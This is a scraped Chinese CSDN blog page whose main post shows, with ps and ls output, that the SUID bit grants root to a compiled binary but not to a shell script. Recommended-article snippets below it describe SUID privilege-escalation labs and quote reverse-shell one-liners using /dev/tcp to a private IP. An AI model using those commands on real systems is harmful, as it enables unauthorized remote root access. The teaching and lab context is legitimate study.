suid 实验

最新推荐文章于 2023-02-22 16:17:38 发布
最新推荐文章于 2023-02-22 16:17:38 发布
阅读量806 收藏
点赞数
分类专栏: linux 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/span76/article/details/51755579
版权

简单验证

看 /usr/bin/passwd 有 suid

-rwsr-xr-x 1 root root 47032   /usr/bin/passwd

用 payne运行它,发现用户是 root  

payne@payne-MS-7678:~/try/uid$ passwd

root      2621  0.0  0.0  64636  1596 pts/12   S+   20:03   0:00              \_ passwd

( 这就是 suid的作用,运行时变owner id, 从来可以获得owner id的权限)


shell 脚本实验

编写 1.sh,设置为跟上边一样的权限

-rwsrwxr-- 1 root  payne   50   19:53 1.sh*

用payne运行起来没有变 root

payne     3027  100  0.0  27196  3088 pts/12   R    20:19   0:08              \_ -bash


一般可执行文件实验

编译一个可执行文件,设置 owner root ,  并设置 suid

-rwsrwxr-x 1 root  payne 8497   20:16 a.out*

用payne运行起来变 root 了

root      3043  100  0.0   4188   356 pts/12   R    20:21   0:05              \_ ./a.out


结论: 

shell脚本的suid 并不生效




span76
关注
专栏目录
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1921
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.命令执行者要对该程序文件拥有执行(x)权限.命令执行者在执行该程序时获得该程序文件属主的身份.
suid验证
weixin_33739627的博客
08-18 115
新建test.sh#!/bin/bash cat/root/testfile新建testfilejust_for_test改变testfile、test.sh的权限chmod+xtest.sh chmodo-rtestfile错误理解:为test.sh设置suid权限,用zch用户可执行test.sh正确做法:test.sh其实是一个纯文本文件,为它设置suid是没...
Linux利用Suid提权实验
qq_45813384的博客
02-20 1102
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
SUID
Ben_JieMing的博客
12-20 916
SerialVersionUID,后面简称SUID,是当对象序列化的时候对象的一个标识(stamp on 在这里我也不太清楚翻译成什么好),SUID的值常为该对象的hascode。你可以使用工具serialver查看一个序列化对象的SUIDSUID用于控制对象的版本。你也可以在类文件中指定SUID。不指定SUID的结果就是当你添加或者更改类的域并已经序列化类的时候,类是不能再恢复了,因为新的SU
suid
wanglongwang201209的专栏
10-17 540
Linux SUID/SGID/SBIT权限 [日期:2012-01-31] 来源:Linux社区  作者:yeelone [字体:大 中 小] 其实SUID和SGID的作用跟sudo是相似的。当用户A想执行一个原本属于用户B的可执行文件时,若B的文件设置了suid位,则A在执行时是以用户 B的身份来执行。     其中一个suid
linux 特殊权限 之 SUID 实例
weixin_33849215的博客
02-23 195
linux 文件特殊权限SUID:set UID简介:SUID权限只对二进制程序有效执行者对于该程序需要具有可执行权限本权限仅在执行该程序的过程有效,执行者将具有该程序拥有者的权限在文件拥有suid权限时,用户只要有执行这个文件的权限就会获得这个文件的属主权限SGID简介:user对此目录具有r与x的权限时,该用户能够进入此目录user在此目录下的有效群组将会变成该目录的...
Linux权限管理实验如何管理SUID /SGID
最新发布
06-11
Linux 权限管理实验中,SUID 和 SGID 是用于管理文件或目录访问权限的重要机制。SUID 和 SGID 分别表示设置文件或目录的属主权限和属组权限,可以用于控制普通用户对某些需要特殊权限才能执行的程序或文件的访问...
23.文件特殊权限之SUID权限、SGID权限、Sticky BIT权限和ACL权限
小鹏linux的博客
01-23 2567
在多用户多任务的Linux系统里,每个进程的运行都与运行的用户和组相关联。除了进程识别号(PID)以外,每个进程还有另外4个用户和用户组相关的识别号。他们分别是:实际用户识别号(RUID)、实际组识别号(RGID)、有效用 户识别号(EUID)、有效组识别号(EGID)。EUID和EGID的作用在于确定一个进程对其访问的文件的权限和优先权。一般情况下, EUID、EGID与RUID和RGID相同。设置了SUID和SGID情况除外。
20210411web渗透学习之Linux SUID提权
qq_45290991的博客
04-13 273
Linux下有很多提权方式,,我记得之前我写了一篇内核提权:web渗透学习之Linux内核提权 内核提权最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid提权。。测试环境为ubutu15.5 SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。 就相当于说:我在使用这个文件的时候,我有了root权限,,所以一般的思路就
网络信息安全实验指导书.doc
11-20
实验内容将涉及调整文件权限,防止SUID和SGID权限被恶意利用,确保系统的安全稳定运行。 通过这个实验指导书,学生将获得对网络信息安全的实践经验,学习如何在实际环境中保护系统免受潜在威胁,提高网络安全防护...
求set uid ,set gid,sticky bit的三个权限的详细说明(转)
congjukun0600的博客
08-09 180
求set uid ,set gid,sticky bit的三个权限的详细说明(转)[@more@]一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号, 表示该文件所属的组, 一般为文件所有者所属的组....
Linux下利用SUID提权
Ms08067安全实验室
03-16 3145
今天给大家带来的是linux下的提权技巧。SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥...
Suid之find提权靶机渗透实战
PANDA墨森的博客
07-11 1533
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用,suid提权之find命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机:192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
busybox | 更改安装目录为/usr/local/bin
Javier Huang的博客
01-23 1036
补丁 diff --git a/libbb/appletlib.c b/libbb/appletlib.c index 03389f5..7520d6d 100644 --- a/libbb/appletlib.c +++ b/libbb/appletlib.c @@ -651,6 +651,7 @@ static void check_suid(int applet_no) # if ENABLE_FEATURE_INSTALLER static const char usr_bin [] ALIGN
在OpenstLinux根文件系统里增加自己的应用程序
17岁boy的博客
02-22 343
这些文件夹都是按照Linux内核所需要的格式提供的,Linux内核启动时会需要文件系统下存在这些文件夹,用于Linux内核做初始化,这些目录结构非常眼熟和我们平时装好发行版时提供的文件夹结构是一样的。不同的系统内核所需要的文件夹也是不同的,这里我们重点关注bin这个文件夹,这里的bin就相当于我们/usr/bin目录,这个文件夹里存放了bin文件,我们可以将我们编译好的二进制文件放入到这个文件夹里去就可以了。可以看到存放了一些常用命令,例如rm、ls、cp等,一般这些工具都是基于busybox制作的。
Yocto系列讲解[技巧篇]82 - 静态库编译问题
fulinux的博客
04-08 1388
静态库编译,busybox,libcrypt等,yocto默认开静态编译的方法
linuxSUID,SGID和SBIT的奇妙用途
zhengwish的专栏
04-24 5719
本文章转自:https://blog.csdn.net/xiaocainiaoshangxiao/article/details/17378611?utm_source=blogxgwz9#commentBox 请访问原网址进行学习~~本文仅做个人知识点记录用途~ linux对文件的权限管理简直是让人叹为观止,又回顾了一下SUID,SGID和SBIT的作用,总结一下。 SU...
busybox
typhoonzb的专栏
07-23 790
busybox  BusyBox 是标准 Linux 工具的一个单个可执行实现。BusyBox 包含了一些简单的工具,例如 cat 和 echo,还包含了一些更大、更复杂的工具,例如 grep、find、mount 以及 telnet。有些人将 BusyBox 称为 Linux 工具里的瑞士军刀.简单的说BusyBox就好像是个大工具箱,它集成压缩了 Linux 的许多工具和命令。  1、Bu
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值